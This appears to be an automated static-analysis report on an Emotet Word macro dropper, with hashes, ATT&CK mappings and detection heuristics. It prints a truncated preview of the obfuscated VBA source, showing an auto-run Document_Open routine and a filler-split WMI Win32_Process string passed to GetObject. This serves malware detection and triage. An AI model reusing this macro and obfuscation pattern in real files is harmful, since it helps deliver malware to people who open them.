Emotet — Office (OOXML) malware analysis

Static analysis result for SHA-256 35399aa0198e6eaa…

MALICIOUS

Office (OOXML)

Size: 128.1 KB
Created: 2020-01-31 19:42:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-04
MD5: 79b4224e5dc0f5d50469f3967df151ae
SHA-1: d6b2f02be92411d0f25a9a066b8cde4829cf0f9a
SHA-256: 35399aa0198e6eaa75c1067a65180500ac022d96f6bbf51a27b2c626e65ffcc9
Risk Score: 264

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Emotet-7572661-0, indicating a known Emotet variant. The combination of a Document_Open auto-execution macro and heavily obfuscated VBA code strongly suggests it is designed to download and execute a secondary payload. The VBA code uses obfuscation techniques (junk assignments and runtime string assembly) and calls GetObject, consistent with Emotet's behavior.

Heuristics (7)

  • ClamAV: Doc.Dropper.Emotet-7572661-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Emotet-7572661-0
  • VBA project inside OOXML [medium, 3 related findings] (OOXML_VBA)
    Document contains a VBA project: VBA macros are present.
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro: this procedure runs automatically as soon as the document is opened with macros enabled, so the code needs no further user interaction to start.
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call: GetObject is invoked on a string that is assembled at runtime. In the extracted preview the fragments, once the repeated /34//22/778//0//3/ filler and the ChrW(wdKeyS) character are resolved, spell out a winmgmts: WMI moniker for Win32_Process, the class used to spawn a new process.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels show which channel (macro, JS, link annotation, document body, ...) reached each URL. In this sample every extracted URL is an XML schema namespace identifier from the OOXML part declarations rather than a payload location.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8692 bytes
SHA-256: f576441decd9c5abba082cf895d8072fa89005c5c54232d594e1e36d2c480702
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Eupvgyresx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   pl34 _
= "{TipTopPo}"
j3u = Edmotpdqfkjxh + Auacaaomtv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Mdmadoavics + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Qsioczduna)
ndko24 = "{TipTopPo}"
nsih6 = 239 + 893 + 636
akj3 = 868 + 756
kqkqn4 = (Ivxqrtswzq) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Kgjgidybdsji
Mplapgma.Pqsdmifqouiss
End Sub


Attribute VB_Name = "Yuqmslzswwycl"
Attribute VB_Base = "0{579E53AB-BE00-459F-8F0D-F494EBF40C6B}{34353EDD-D899-46E5-B121-745F0A40376F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Mplapgma"
Function Pqsdmifqouiss()
   pl34 _
= "{TipTopPo}"
j3u = Bjofvbhxhhko + Kxebzguhiid
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Poivfccvwpsk + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zedoebhbhyg)
ndko24 = "{TipTopPo}"
nsih6 = 807 + 124 + 223
akj3 = 793 + 964
kqkqn4 = (Xuafbvisi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Eleuoilqrs
Qssxvhhq = "/34//22/778//0//3/wi/34//22/778//0//3/nm/34//22/778//0//3/g/34//22/778//0//3/mt/34//22/778//0//3/" + ChrW(Int(wdKeyS)) + "/34//22/778//0//3/:w/34//22/778//0//3/in/34//22/778//0//3/32/34//22/778//0//3/_" + Yuqmslzswwycl.Vaumcniw + "r/34//22/778//0//3/oc/34//22/778//0//3/e/34//22/778//0//3/s/34//22/778//0//3/s"
   pl34 _
= "{TipTopPo}"
j3u = Zwuzcutxi + Kpaghoeojudaf
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Gekzvdqwy + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Dquwwzdaifakg)
ndko24 = "{TipTopPo}"
nsih6 = 508 + 944 + 171
akj3 = 872 + 190
kqkqn4 = (Kjkwwpuwoo) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Gsutbpilou
Quaaasngkwx = Varxdtkcwm(Qssxvhhq)
   pl34 _
= "{TipTopPo}"
j3u = Brxdamqi + Dljucipzxqwq
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Lzpgiixekkc + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Gunvpxsw)
ndko24 = "{TipTopPo}"
nsih6 = 698 + 358 + 246
akj3 = 348 + 180
kqkqn4 = (Nywjbdagkzi) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Xjzrxzbz
Set Hgfvzjsefnnn = GetObject(Quaaasngkwx)
   pl34 _
= "{TipTopPo}"
j3u = Tzxxvzdfma + Cxwqcnkqtc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Qzyjcjxbmb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Ismsttnhmvyt)
ndko24 = "{TipTopPo}"
nsih6 = 682 + 875 + 999
akj3 = 584 + 338
kqkqn4 = (Yizntrjm) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Btdcdsxaochjb
Qvxgssfdwu = Yuqmslzswwycl.Igcttfmk.Tag
   pl34 _
= "{TipTopPo}"
j3u = Yfknkqvg + Xwhnszpxtg
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Cefaxqhmxjnb + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Nmvhmongtodmc)
ndko24 = "{TipTopPo}"
nsih6 = 251 + 170 + 847
akj3 = 436 + 660
kqkqn4 = (Pbkihdghktey) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Nifoulcclt
Hunodmcel = Quaaasngkwx + ChrW(Int(wdKeyS)) + Yuqmslzswwycl.Kcayeyzlzbvf.Tag + Qvxgssfdwu
   pl34 _
= "{TipTopPo}"
j3u = Bhevvreldf + Owjhskmqv
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Rhtstnmlgin + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Zdyaifmhxkjji)
ndko24 = "{TipTopPo}"
nsih6 = 196 + 747 + 874
akj3 = 414 + 347
kqkqn4 = (Fmlqtunnbzkx) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ixaljiolliqv
Zwndiejpwjmo = Hunodmcel + Yuqmslzswwycl.Vaumcniw
   pl34 _
= "{TipTopPo}"
j3u = Qhofmcqavggcn + Kamhfpcwxjsnc
de3 = "{TipTopPo}"
msih7 = ("{TipTopPo}")
ij56b = Bgusarqf + "{TipTopPo}"
nsj4 = ("{TipTopPo}")
djhb6 = (Eafgyzhkitogj)
ndko24 = "{TipTopPo}"
nsih6 = 856 + 603 + 957
akj3 = 372 + 425
kqkqn4 = (Olrvtporsf) + ("{TipTopPo}")
snf3 = ("{TipTopPo}")
wern = Ueitvzjbo
Set Rcyklzqzxbej = Figrtjza(Zwndiejpwjmo)
   pl34 _
= "{TipTopPo}"
j3u = Stkqami
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 56832 bytes
SHA-256: a95c60b9f1b12ce0318b49db6f0149dba894f256011dde34f464c69e9153d383
Detection: ClamAV: Doc.Dropper.Emotet-7572661-0
Obfuscation or payload: likely (carved artifact contains 2 long base64-like blobs)